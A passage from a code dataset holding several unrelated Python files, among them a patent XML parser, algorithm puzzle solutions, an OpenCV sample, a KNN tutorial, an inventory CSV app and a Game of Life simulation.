ET.Element('data')\n\n\tfor CLAIMs in root: # tag : CLAIMs\n\t\tfor CLAIM in CLAIMs: # tag : CLAIM\n\t\t\tfor claim_text in CLAIM: # tag : claim-text\n\t\t\t\tif 'claim-text' not in claim_text.tag:\n\t\t\t\t\tbreak\n\t\t\t\tfor claim_ref in claim_text: # tag : claim-ref\n\t\t\t\t\tif 'claim-ref' in claim_ref.tag:\n\t\t\t\t\t\titem = ET.SubElement(data, 'item')\n\t\t\t\t\t\t\n\t\t\t\t\t\tPDAT1 = ET.SubElement(item, 'PDAT1')\n\t\t\t\t\t\tPDAT1.text = claim_text.text\n\n\t\t\t\t\t\tCLREF = ET.SubElement(item, 'CLREF')\n\t\t\t\t\t\tCLREF.set('CLREF',claim_ref.attrib['idref'])\n\n\t\t\t\t\t\tPDAT2 = ET.SubElement(item, 'PDAT2')\n\t\t\t\t\t\tPDAT2.text = claim_ref.tail\n\t\t\t\t\t\t\n\n\tfilter_file = open(path + output_name, 'wb') # ET.tostring returns bytes, so open in binary mode\n\tmydata = ET.tostring(data)\n\tfilter_file.write(mydata)\n\tfilter_file.close()\n\nparseXml59()\n","repo_name":"duqrlpig/patent_ml_project","sub_path":"patent_parser/XmlParser/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"43063105213","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\ndef main():\r\n dslr = DSLR() # create the solver instance\r\n for _ in range(int(input())):\r\n s, e = map(int, input().split())\r\n dslr.input_data(s, e)\r\n dslr.p() # print the answers\r\n\r\nclass DSLR:\r\n def __init__(self):\r\n self.li = [] # list storing the command sequences to print\r\n\r\n # Using queues, apply the DSLR operations forward from the given integer A\r\n # and the inverse DSLR operations backward from B,\r\n # searching until the two frontiers meet in the middle\r\n def searching(self):\r\n while True:\r\n xs, ys = self.sq.popleft(), self.eq.popleft()\r\n self.xt = []\r\n self.yt = []\r\n\r\n # push the results of the forward DSLR operations onto the queue\r\n for x in xs:\r\n x0 = (x<<1)%10000\r\n if self.fx(x, x0, \"D\"): return\r\n x1 = (x-1)%10000\r\n if self.fx(x, x1, \"S\"): return\r\n x2 = (x*10)%10000 + x//1000\r\n if self.fx(x, x2, \"L\"): return\r\n x3 = x%10*1000 + x//10\r\n if self.fx(x, x3, \"R\"): return\r\n self.sq.append(self.xt)\r\n\r\n # push the results of the inverse DSLR operations onto the queue\r\n for y in ys:\r\n if not y%2:\r\n y0 = y>>1\r\n if self.fy(y, y0, \"D\"): return\r\n y0 += 5000\r\n if self.fy(y, y0, \"D\"): return\r\n y1 = (y+1)%10000\r\n if self.fy(y, y1, \"S\"): return\r\n y2 = y%10*1000 + y//10\r\n if self.fy(y, y2, \"L\"): return\r\n y3 = (y*10)%10000 + y//1000\r\n if self.fy(y, y3, \"R\"): return\r\n self.eq.append(self.yt)\r\n\r\n # after a DSLR operation, a first-visited integer is marked visited by\r\n # recording its operation string; if it overlaps an integer reached from\r\n # the other side, the two operation records are joined and stored in self.li\r\n def fx(self, x: int, nx: int, op: str):\r\n if nx not in self.sd:\r\n self.sd[nx] = self.sd[x] + op\r\n if nx in self.ed:\r\n self.li.append(self.sd[nx] + self.ed[nx])\r\n return True\r\n self.xt.append(nx)\r\n\r\n # performs the DSLR operations in reverse; otherwise the same as self.fx\r\n def fy(self, y: int, ny: int, op: str):\r\n if ny not in self.ed:\r\n self.ed[ny] = op + self.ed[y]\r\n if ny in self.sd:\r\n self.li.append(self.sd[ny] + self.ed[ny])\r\n return True\r\n self.yt.append(ny)\r\n
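\r\n # (meeting in the middle keeps both BFS frontiers shallow -- each side only\r\n # explores roughly half the operation-sequence length of a one-sided search)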
\r\n # build the search queues and visited dictionaries for the two input\r\n # integers, then run the search\r\n def input_data(self, s: int, e: int):\r\n self.sd = {s: \"\"}\r\n self.ed = {e: \"\"}\r\n self.sq = deque([[s]])\r\n self.eq = deque([[e]])\r\n self.searching()\r\n \r\n def p(self):\r\n print(\"\\n\".join(self.li))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"k4west/Baekjoon_Python","sub_path":"백준/Gold/9019. DSLR/DSLR.py","file_name":"DSLR.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"599321920","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('messi5.jpg')\nimg2 = cv2.imread('opencv-logo.png')\n\nprint(img.shape)\nprint(img.size)\nprint(img.dtype)\n\nb,g,r= cv2.split(img)\nimg = cv2.merge((b,g,r))\n\n# Region of interest\nball = img[280:340, 330:390]\nimg[273:333, 100:160] = ball\n\n#Resizing two images\nimg = cv2.resize(img, (512,512))\nimg2 = cv2.resize(img2, (512,512))\n\n#Adding two images\n#outImg = cv2.add(img, img2) # without specifying any opaque values (weighted values)\n\noutImg = cv2.addWeighted(img, .8, img2, 0.2, 0) # 0.8 is for img weight and 0.2 is img2 weight and 0 is gamma ( Scalar value )\n\n\ncv2.imshow(\"Image\", outImg)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"SwapnilSilam/py-open-cv-samples","sub_path":"samples/7_add_two_images.py","file_name":"7_add_two_images.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"15896843513","text":"#!/usr/bin/env python3\n\nimport markup\nimport sys\n\ndef m(cat):\n return markup.markup(cat, lambda x: x)\n\nrules = []\n\nfor line in sys.stdin:\n try:\n left_cat, right_cat, cat, head, name = line.split()\n rule = '{}\\t{}\\t{}\\t{}\\t{}'.format(m(left_cat),\n m(right_cat), m(cat), head, name)\n if rule not in rules:\n rules.append(rule)\n except ValueError:\n old_cat, new_cat, name = line.split()\n rule = '{}\\t{}\\t{}'.format(m(old_cat), m(new_cat),\n name)\n if rule not in rules:\n rules.append(rule)\n\nfor rule in rules:\n print(rule)\n","repo_name":"rug-compling/epar","sub_path":"scripts/grammar_markup.py","file_name":"grammar_markup.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}{"seq_id":"28405429682","text":"from parchmint import Component\n\nfrom pymint.constraints.layoutconstraint import LayoutConstraint, OperationType\n\n\nclass RotationConstraint(LayoutConstraint):\n \"\"\"Layout constraint that fixes the absolute rotation\n of the component\n\n \"\"\"\n\n def __init__(self, component: Component, rotation: float) -> None:\n \"\"\"Creates a Rotation constraint\n\n Args:\n component (Component): Component to be covered by the constraint\n rotation (float): rotation fixed by the constraint\n \"\"\"\n super().__init__(OperationType.EXPLICIT_OPERATION)\n self._components.append(component)\n self.rotation = rotation\n self._type = \"ROTATION_CONSTRAINT\"\n\n @property\n def component(self) -> Component:\n \"\"\"Returns the component covered by the constraint\n\n Returns:\n Component: constrained component\n \"\"\"\n return self._components[0]\n\n @property\n def rotation(self) -> float:\n \"\"\"Returns the rotation fixed by the constraint\n\n Returns:\n float: rotation value\n \"\"\"\n if self._params.exists(\"rotation\"):\n
return self._params.get_param(\"rotation\")\n else:\n raise KeyError(\"rotation not set in the constraint\")\n\n @rotation.setter\n def rotation(self, rotation: float) -> None:\n \"\"\"Sets the rotation fixed by the constraint\n\n Args:\n rotation (float): rotation value\n \"\"\"\n self._params.set_param(\"rotation\", rotation)\n","repo_name":"CIDARLAB/pyMINT","sub_path":"pymint/constraints/rotationconstraint.py","file_name":"rotationconstraint.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10750039614","text":"from teeth_overlord import errors\nfrom teeth_overlord import models\nfrom teeth_overlord import scheduler\nfrom teeth_overlord import tests\n\n\nclass TestInstanceScheduler(tests.TeethMockTestUtilities):\n\n def setUp(self):\n super(TestInstanceScheduler, self).setUp()\n\n self.add_mock(models.Instance, 'batch')\n self.add_mock(models.Chassis, 'batch')\n\n self.scheduler = scheduler.TeethInstanceScheduler()\n\n self.instance1 = models.Instance(id='instance1',\n name='instance1_name',\n flavor_id='flavor1',\n image_id='image1')\n\n self.flavorprovider1 = models.FlavorProvider(\n flavor_id='flavor1',\n chassis_model_id='chassismodel1',\n deleted=False)\n\n self.chassis1 = models.Chassis(\n id='chassis1',\n state=models.ChassisState.READY)\n\n def test_reserve_chassis(self):\n self.add_mock(models.Instance)\n chassis_mock = self.add_mock(models.Chassis,\n return_value=[self.chassis1])\n flavor_provider_mock = self.add_mock(\n models.FlavorProvider,\n return_value=[self.flavorprovider1])\n\n self.scheduler.reserve_chassis(self.instance1, retry=False)\n\n flavor_provider_mock.assert_called_once_with(\n 'filter',\n deleted=False,\n flavor_id=self.instance1.flavor_id)\n chassis_mock.assert_called_once_with(\n 'filter',\n state=models.ChassisState.READY)\n chassis_mock.assert_called_once_with(\n 'filter',\n chassis_model_id=self.flavorprovider1.chassis_model_id)\n\n self.assertEqual(self.instance1.chassis_id, self.chassis1.id)\n self.assertEqual(self.instance1.state, models.InstanceState.INACTIVE)\n self.assertEqual(self.chassis1.state, models.ChassisState.BUILD)\n\n instance_batch_mock = self.get_mock(models.Instance, 'batch')\n self.assertEqual(instance_batch_mock().save.call_count, 1)\n\n chassis_batch_mock = self.get_mock(models.Chassis, 'batch')\n self.assertEqual(chassis_batch_mock().save.call_count, 1)\n\n def test_reserve_chassis_already_reserved(self):\n self.chassis1.state = models.ChassisState.ACTIVE\n chassis_mock = self.add_mock(models.Chassis,\n return_value=[self.chassis1])\n flavor_provider_mock = self.add_mock(\n models.FlavorProvider,\n return_value=[self.flavorprovider1])\n\n self.assertRaises(errors.ChassisAlreadyReservedError,\n self.scheduler.reserve_chassis,\n self.instance1,\n retry=False)\n flavor_provider_mock.assert_called_once_with(\n 'filter',\n deleted=False,\n flavor_id=self.instance1.flavor_id)\n chassis_mock.assert_called_once_with(\n 'filter',\n state=models.ChassisState.READY)\n chassis_mock.assert_called_once_with(\n 'filter',\n chassis_model_id=self.flavorprovider1.chassis_model_id)\n\n def test_reserve_chassis_no_capacity(self):\n flavor_provider_mock = self.add_mock(models.FlavorProvider,\n return_value=[])\n\n self.assertRaises(errors.InsufficientCapacityError,\n self.scheduler.reserve_chassis,\n self.instance1,\n retry=False)\n flavor_provider_mock.assert_called_once_with(\n 'filter',\n deleted=False,\n 
flavor_id=self.instance1.flavor_id)\n","repo_name":"rackerlabs/teeth-overlord","sub_path":"teeth_overlord/tests/unit/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4517005731","text":"import csv\nimport os\n\ndef menu(username=\"@prof-rossetti\", products_count=100):\n # this is a multi-line string, also using preceding `f` for string interpolation\n menu = f\"\"\"\n -----------------------------------\n INVENTORY MANAGEMENT APPLICATION\n -----------------------------------\n Welcome {username}!\n There are {products_count} products in the database.\n operation | description\n --------- | ------------------\n 'List' | Display a list of product identifiers and names.\n 'Show' | Show information about a product.\n 'Create' | Add a new product.\n 'Update' | Edit an existing product.\n 'Destroy' | Delete an existing product.\n 'Reset' | Reset the list of products.\n Please select an operation: \"\"\" # end of multi- line string. also using string interpolation\n return menu\n\ncsv_headers = [\"id\", \"name\", \"aisle\", \"department\", \"price\"]\n\ndef read_products_from_file(filename=\"products.csv\"):\n filepath = os.path.join(os.path.dirname(__file__), \"db\", filename)\n print(f\"READING PRODUCTS FROM FILE: '{filepath}'\")\n products = []\n #TODO: open the file and populate the products list with product dictionaries\n with open(filepath, \"r\") as csv_file:\n reader = csv.DictReader(csv_file)\n for ordered_dict in reader:\n products.append(dict(ordered_dict))\n return products\n\n\n\ndef write_products_to_file(filename=\"products.csv\", products=[]):\n filepath = os.path.join(os.path.dirname(__file__), \"db\", filename)\n print(f\"OVERWRITING CONTENTS OF FILE: '{filepath}' \\n ... WITH {len(products)} PRODUCTS\")\n #TODO: open the file and write a list of dictionaries. 
each dict should represent a product.\n with open(filepath, \"w\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=csv_headers)\n writer.writeheader()\n for product in products:\n writer.writerow(product)\n\ndef reset_products_file(filename=\"products.csv\", from_filename=\"products_default.csv\"):\n print(\"RESETTING DEFAULTS\")\n products = read_products_from_file(from_filename)\n write_products_to_file(filename, products)\n\n\ndef auto_incremented_id (products):\n return int(products[-1][\"id\"])+1\n\n\ndef run():\n # First, read products from file...\n products = read_products_from_file()\n\n # Then, prompt the user to select an operation...\n #print(menu(username=\"@some-user\")) #TODO instead of printing, capture user input\n number_of_products = len(products)\n my_menu = menu(username = \"@some-user\", products_count = number_of_products)\n operation = input(my_menu)\n #print(\"YOU CHOSE: \" + operation)\n # Then, handle selected operation: \"List\", \"Show\", \"Create\", \"Update\", \"Destroy\" or \"Reset\"...\n operation = operation.title()\n\n if operation == \"List\":\n print(\"LISTING PRODUCTS\")\n for p in products:\n print(\"...\" + p[\"id\"] +\" \"+ p[\"name\"])\n\n\n elif operation == \"Show\":\n print(\"SHOWING A PRODUCT\")\n product_id = input (\"What's the id of the product you want to display?\")\n print(product_id)\n matching_products = [p for p in products if int(p[\"id\"]) == int(product_id)]\n matching_product = matching_products[0]\n print(matching_product)\n\n\n elif operation == \"Create\":\n\n new_id = auto_incremented_id(products)\n new_product = input (\"--What is your new product name? \")\n new_aisle = input (\"--What is your new product's aisle? \")\n new_dept = input (\"--What is your new product's department? \")\n new_price = input (\"--What is your new product's price? \")\n new_product = {\n \"id\": new_id,\n \"name\": new_product,\n \"aisle\": new_aisle,\n \"department\": new_dept,\n \"price\": new_price\n } ## TODO:\n products.append(new_product)\n print(\"YOU HAVE CREATED A NEW PRODUCT: \", new_product)\n\n\n\n\n\n elif operation == \"Update\":\n product_id = input(\"What's the id of the product you would like to update?\")\n matching_products = [p for p in products if int(p[\"id\"]) == int(product_id)]\n matching_product = matching_products[0]\n update_product = input(\"--What is your new product name? Please type the original product name if there is no change: \")\n update_aisle = input(\"--What is your new product aisle? Please type the original aisle name if there is no change: \")\n update_department = input(\"--What is your new product department? Please type the original department name if there is no change: \")\n update_price = input(\"--What is your new product price? 
Please type the original price if there is no change: \")\n # update the matching dict in place so the change actually lands in `products`\n # (re-assigning the name `matching_product` to a new dict left the list untouched)\n matching_product.update({\n \"name\": update_product,\n \"aisle\": update_aisle,\n \"department\": update_department,\n \"price\": update_price\n })\n print(\"YOU HAVE UPDATED A PRODUCT: \", matching_product)\n\n\n\n elif operation == \"Destroy\":\n product_id = input (\"What's the id of the product you would like to destroy?\")\n matching_products = [p for p in products if int(p[\"id\"]) == int(product_id)]\n matching_product = matching_products[0]\n del products[products.index(matching_product)]\n print(\"DELETING A PRODUCT\")\n\n\n elif operation == \"Reset\":\n reset_products_file()\n return\n\n else:\n print(\"Unrecognized Operation, please select one of 'List', 'Show', 'Create', 'Update', 'Destroy' or 'Reset'.\")\n\n # Finally, save products to file so they persist after script is done...\n write_products_to_file(products=products)\n# only prompt the user for input if this script is run from the command-line\n# this allows us to import and test this application's component functions\nif __name__ == \"__main__\":\n run()\n","repo_name":"LillianRui/inventory-mgmt-app-py","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}{"seq_id":"35852769997","text":"# John Green\r\n# 1001011958\r\n# 11/8/13\r\n\"\"\"\r\nthe program prints out\r\n\r\nkeys\r\nvalues\r\nkey and value pairs\r\nkey and value pairs in order of key\r\nkey and value pairs in order of value\r\n\r\n\"\"\"\r\n\r\n\r\n\r\ndef main():\r\n d = {'a':15, 'f':35, 'b':120}\r\n keys = list(d.keys())\r\n print(\"The keys are: \", end = \"\")\r\n for i in keys: # prints the keys\r\n if i == keys[-1]: # test for last key\r\n print(i)\r\n break\r\n print(i, end = \",\")\r\n\r\n values = list(d.values())\r\n print(\"The values are: \", end = \"\")\r\n for i in values: # prints out the values\r\n if i == values[-1]: # test for last value\r\n print(i)\r\n break\r\n print(i, end = \",\")\r\n\r\n items = list(d.items())\r\n print(\"The (key,value) pairs are: \", end = \"\")\r\n for i in items: # print item pairs\r\n if i == items[-1]: # tests for last pair\r\n print(i)\r\n break\r\n print(i, end = \"\")\r\n\r\n sets = sorted(d.items())\r\n print(\"The values in order of the keys are: \", end = \"\")\r\n for i in sets: # sorts pairs by keys\r\n if i == sets[-1]: # tests for last pair\r\n print(i)\r\n break\r\n print(i, end = \",\")\r\n \r\n values.sort()\r\n print(\"The keys in order of the values are: \", end = \"\")\r\n for i in values: # sorts pairs by values\r\n for N in sets:\r\n if N[1] == i:\r\n if i == values[-1]:# tests for last pair\r\n print(N)\r\n break\r\n print(N, end = \",\")\r\n\r\n\r\nmain()\r\n","repo_name":"JohnJGreen/1310Python","sub_path":"hw08/hw08_task1.py","file_name":"hw08_task1.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"30796920411","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\\\n# Complete the journeyToMoon function below.
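\n# idea: astronauts of the same country form connected components of the graph;\n# the answer is the number of unordered pairs drawn from two different components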
\nimport sys\n\ndef dfs_count(graph, visited, node, count):\n if visited[node]==False:\n visited[node]=True\n count+=1\n for n in graph[node]:\n count = dfs_count(graph, visited, n, count)\n return count\n \nsys.setrecursionlimit(1500)\nn,p= input().split()\nn = int(n)\np = int(p)\n\nastronaut = []\nfor _ in range(p):\n astronaut.append(list(map(int, input().split())))\ngraph=[[] for _ in range(n)]\nfor i in range(p):\n graph[astronaut[i][0]].append(astronaut[i][1])\n graph[astronaut[i][1]].append(astronaut[i][0])\n\ncountarr=[]\nvisited=[False for _ in range(n)]\nfor i in range(n):\n if visited[i]==False:\n count=0\n count = dfs_count(graph, visited, i, count)\n countarr.append(count)\n\nif len(countarr)>1:\n res=countarr[0]*countarr[1]\n csum=countarr[0]+countarr[1]\n for i in countarr[2:]:\n res+=csum*i\n csum+=i\n print(res)\nelse:\n print(0)\n","repo_name":"tashif-hoda/APS-2020","sub_path":"journey to the moon.py","file_name":"journey to the moon.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"26668050135","text":"#Sara Nersisian\r\n#CS 1260\r\n#Project 1 - Problem 2\r\n#11/14/2020\r\n\r\nimport math\r\nprint(\"\\n*** Quadratic Equation Solver ***\")\r\na = int(input(\"Enter a: \"))\r\nb = int(input(\"Enter b: \"))\r\nc = int(input(\"Enter c: \"))\r\n\r\ndeterminant = (b ** 2) - 4 * a * c\r\n\r\nif determinant > 0:\r\n x1 = (-1 * b + math.sqrt(determinant)) / (2 * a)\r\n x2 = (-1 * b - math.sqrt(determinant)) / (2 * a)\r\n print(\"\\nThe two real roots are %.2f and %.2f\" %(x1,x2))\r\nelif determinant == 0:\r\n x = (-1 * b ) / (2 * a)\r\n print(\"\\nThe only real root is %.2f\" %(x))\r\nelse:\r\n print(\"\\nNo real roots! \")\r\n \r\n \r\n \r\n \r\n","repo_name":"saraNersisian/Introductory-Python","sub_path":"Pj1_P2_QuadreticEquation.py","file_name":"Pj1_P2_QuadreticEquation.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"42773766122","text":"\"\"\"\nDeveloper: vkyprmr\nFilename: knn.py\nCreated on: 2020-09-03 at 16:46:57\n\"\"\"\n\"\"\"\nModified by: vkyprmr\nLast modified on: 2020-09-03 at 18:52:19\n\"\"\"\n\n\n# Imports\nfrom loaddata import LoadData\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\nimport mglearn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# Data\nld = LoadData()\n\nX_forge, y_forge = ld.load_forge(visualize=False)\nX_forge_train, X_forge_test, y_forge_train, y_forge_test = train_test_split(X_forge, y_forge, random_state=0)\n\n\n# Classifier\nknc = KNeighborsClassifier(n_neighbors=2)\nknc.fit(X_forge_train, y_forge_train)\npreds = knc.predict(X_forge_test)\n\nprint(f'Score: {knc.score(X_forge_test, y_forge_test)}')\n\n\n# Finding optimal 'n_neighbors' by comparing train and test scores/acc\ntrain_acc = []\ntest_acc = []\nK = range(1,10)\nfor k in K:\n knc = KNeighborsClassifier(n_neighbors=k)\n knc.fit(X_forge_train, y_forge_train)\n train = knc.score(X_forge_train, y_forge_train)\n train_acc.append(train)\n test = knc.score(X_forge_test, y_forge_test)\n test_acc.append(test)\n\n# Plot the elbow\nplt.plot(K, train_acc, 'bx-')\nplt.plot(K, test_acc)\nplt.xlabel('k')\nplt.ylabel('Acc')\nplt.title('Train acc vs. 
Test acc')\nplt.show()\n\n\n# Visualizing different possibilities\nfig, axes = plt.subplots(2,3)\nn_neighbors = [1,3,9,12,15,18]\nfor n_neighbors, ax in zip(n_neighbors, axes.flatten()):\n knc = KNeighborsClassifier(n_neighbors)\n knc.fit(X_forge, y_forge)\n mglearn.plots.plot_2d_separator(knc, X_forge, fill=True, eps=0.5, ax=ax, alpha=0.3)\n mglearn.discrete_scatter(X_forge[:,0], X_forge[:,1], y_forge, ax=ax)\n ax.set_title(f'{n_neighbors} neighbor(s)')\n ax.set_xlabel('Feature A')\n ax.set_ylabel('Feature B')\naxes[0][0].legend()\n\n\"\"\"\n As you can see on the left in the figure, using a single neighbor results in a decision boundary that follows the training data closely. Considering more and more neighbors leads to a smoother decision boundary. A smoother boundary corresponds to a simpler model. In other words, using few neighbors corresponds to high model complexity (as shown on the right side of Figure 2-1), and using many neighbors corresponds to low model complexity (as shown on the left side of Figure 2-1). If you consider the extreme case where the number of neighbors is the number of all data points in the training set, each test point would have exactly the same neighbors (all training points) and all predictions would be the same: the class that is most frequent in the training set.\n\"\"\"\n\n\n# Cancer data\nX_cancer, y_cancer, fn_cancer, tn_cancer = ld.load_cancer()\nX_cancer_train, X_cancer_test, y_cancer_train, y_cancer_test = train_test_split(X_cancer, y_cancer, stratify=y_cancer, random_state=42)\n\n# Finding optimal 'n_neighbors' by comparing train and test scores/acc\ntrain_acc = []\ntest_acc = []\nK = range(1,15)\nfor k in K:\n knc = KNeighborsClassifier(n_neighbors=k)\n knc.fit(X_cancer_train, y_cancer_train)\n train = knc.score(X_cancer_train, y_cancer_train)\n train_acc.append(train)\n test = knc.score(X_cancer_test, y_cancer_test)\n test_acc.append(test)\n\n# Plot the elbow\nplt.plot(K, train_acc, label='Train')\nplt.plot(K, test_acc, label='Test')\nplt.xlabel('k')\nplt.ylabel('Acc')\nplt.title('Train acc vs. 
Test acc')\nplt.legend()\nplt.show()\n\n\n# Making regression model for wave dataset\nX_wave, y_wave = ld.load_wave(visualize=False)\nX_wave_train, X_wave_test, y_wave_train, y_wave_test = train_test_split(X_wave, y_wave, random_state=0)\nknr = KNeighborsRegressor(n_neighbors=3)\nknr.fit(X_wave_train, y_wave_train)\nprint(f'R^2 score: {knr.score(X_wave_test, y_wave_test)}')\n\n\n# Finding optimal 'n_neighbors' by comparing train and test scores/acc\nfig, axes = plt.subplots(1, 3)\n# create 1,000 data points, evenly spaced between -3 and 3\nline = np.linspace(-3, 3, 1000).reshape(-1, 1)\nfor n_neighbors, ax in zip([1, 3, 9], axes):\n # make predictions using 1, 3, or 9 neighbors\n reg = KNeighborsRegressor(n_neighbors=n_neighbors)\n reg.fit(X_wave_train, y_wave_train)\n ax.plot(line, reg.predict(line))\n ax.plot(X_wave_train, y_wave_train, '^', c=mglearn.cm2(0), markersize=4)\n ax.plot(X_wave_test, y_wave_test, 'v', c=mglearn.cm2(1), markersize=4)\n ax.set_title(\n \"{} neighbor(s)\\n train score: {:.2f} test score: {:.2f}\".format(\n n_neighbors, reg.score(X_wave_train, y_wave_train),\n reg.score(X_wave_test, y_wave_test)))\n ax.set_xlabel(\"Feature\")\n ax.set_ylabel(\"Target\")\naxes[0].legend([\"Model predictions\", \"Training data/target\",\n\"Test data/target\"], loc=\"best\")\n\n\n","repo_name":"vkyprmr/projectGain","sub_path":"LiteratureGain/intro2ml_wpython/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"35031749629","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nfrom collections import deque\nclass Solution:\n def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n ans = []\n def traverse(root):\n if root is None:\n return []\n queue = deque()\n queue.append([root,1])\n while queue:\n curr, depth = queue.popleft()\n ans.append([curr.val,depth])\n if curr.left is not None:\n queue.append([curr.left,depth+1])\n if curr.right is not None:\n queue.append([curr.right,depth+1])\n traverse(root)\n if len(ans)==0:\n return []\n result = [[ans[0][0]]]\n curr_depth = ans[0][1]\n for node_val, depth in ans[1:]:\n if depth==curr_depth:\n result[-1].append(node_val)\n else:\n curr_depth = depth\n result.append([node_val])\n\n return result\n\n ","repo_name":"ABHISHEKVALSAN/leetcode","sub_path":"0102-binary-tree-level-order-traversal/0102-binary-tree-level-order-traversal.py","file_name":"0102-binary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"34086332991","text":"\"\"\"Example program computing the population proportions for every possible survival value.\r\nThe resulting data are plotted by the exemple_plot.py program.\"\"\"\r\n\r\nimport numpy as np\r\nfrom math import sqrt\r\n\r\n\r\ndef first_gen(proportion, shape):\r\n \"\"\" returns a shuffled one-dimensional vector containing a number of 1s\r\n matching the proportion given as input\r\n input :\r\n proportion : fraction of the grid occupied by the initial population\r\n\r\n shape : the shape of the matrix, which need not be square\r\n\r\n output :\r\n population, shuffled initial population vector\"\"\"\r\n\r\n population = np.zeros(shape)\r\n population[1:-1, 1:-1] = np.random.binomial(1, proportion, (shape[0]-2, shape[1]-2)) # insert the 1s into a smaller inner matrix so the borders never need handling\r\n # [1:-1] stops at the second-to-last row/column\r\n return population\r\n\r\ndef next_generation(pop, nb_survie, nb_surpopulation, nb_naissance) :\r\n \"\"\"returns the new generation n+1 computed from the input pop\"\"\"
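\r\n # generalised Life-style rules below: a live cell survives when\r\n # nb_survie <= live neighbours < nb_surpopulation, and an empty cell gives\r\n # birth when live neighbours >= nb_naissance (note the >=, unlike Conway's exact-3 birth)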
\r\n new = np.zeros(pop.shape) # create the next generation filled with 0s; pop.shape keeps the same shape\r\n for ligne in range(1, pop.shape[0] - 1):\r\n for colonne in range (1, pop.shape[1] - 1):\r\n compteur_vie = scan(ligne,colonne, pop)\r\n if pop[ligne,colonne] == 1 :\r\n if compteur_vie < nb_survie:\r\n new[ligne,colonne] = 0\r\n elif nb_survie <= compteur_vie < nb_surpopulation:\r\n new[ligne,colonne] = 1\r\n elif compteur_vie >= nb_surpopulation :\r\n new[ligne,colonne] = 0\r\n else:\r\n if compteur_vie >= nb_naissance :\r\n new[ligne,colonne] = 1\r\n\r\n return new\r\n\r\ndef final_generations(pop, nb_survie, nb_surpopulation, nb_naissance, NB_GENERATION):\r\n \"\"\"returns the last of the n generations defined beforehand\"\"\"\r\n for i_generation in range(NB_GENERATION):\r\n pop = next_generation(pop, nb_survie, nb_surpopulation, nb_naissance)\r\n if np.mean(pop) == 0:\r\n break\r\n return pop\r\n\r\ndef scan(m,n, pop):\r\n \"\"\"scans the 8 surrounding cells and returns the number of live cells\"\"\"\r\n return np.sum(pop[(m-1):(m+2), (n-1) : (n+2)]) - pop[m,n]\r\n\r\n\r\ndef proportion_moyenne(nb_survie, nb_surpopulation, nb_naissance , proportion_initiale, TAILLE_GRILLE):\r\n \"\"\"returns the mean proportion of the final population after N generations\"\"\"\r\n pop = first_gen(proportion_initiale, TAILLE_GRILLE)\r\n final_gen = final_generations(pop, nb_survie, nb_surpopulation, nb_naissance, NB_GENERATION)\r\n return np.mean(final_gen)\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n TAILLE_GRILLE = (100,100)\r\n NB_SURVIES = range(1,9)\r\n NB_SURPOPULATION = [3,4]\r\n NB_NAISSANCE = [3]\r\n PROP_INITIALE = [0.4, 0.5]\r\n N_SIM = 100\r\n NB_GENERATION = 20\r\n DECOMPTE_MESURES = len(NB_SURVIES)*len(NB_SURPOPULATION)*len(NB_NAISSANCE)*len(PROP_INITIALE)*N_SIM\r\n\r\n stats = np.zeros((len(NB_SURVIES),len(NB_SURPOPULATION), len(NB_NAISSANCE), len(PROP_INITIALE), N_SIM))\r\n\r\n compteur = 0\r\n for i_surv, nb_survie in enumerate(NB_SURVIES):\r\n for i_surpop, nb_surpopulation in enumerate(NB_SURPOPULATION):\r\n for i_naiss, nb_naissance in enumerate(NB_NAISSANCE):\r\n for i_prop, proportion_initiale in enumerate(PROP_INITIALE):\r\n for i_sim in range(N_SIM):\r\n stats[i_surv, i_surpop, i_naiss, i_prop, i_sim] = proportion_moyenne(nb_survie, nb_surpopulation, nb_naissance , proportion_initiale, TAILLE_GRILLE)\r\n compteur += 1\r\n print(f'{round(compteur*100/DECOMPTE_MESURES, 2)}% prop = {stats[i_surv, i_surpop, i_naiss, i_prop, i_sim]}')\r\n # useful for tracking the algorithm's progress
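\r\n# (ndarray.dump pickles the array; exemple_plot.py can presumably reload it with\r\n# np.load(\"matrice_test_plot.txt\", allow_pickle=True))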
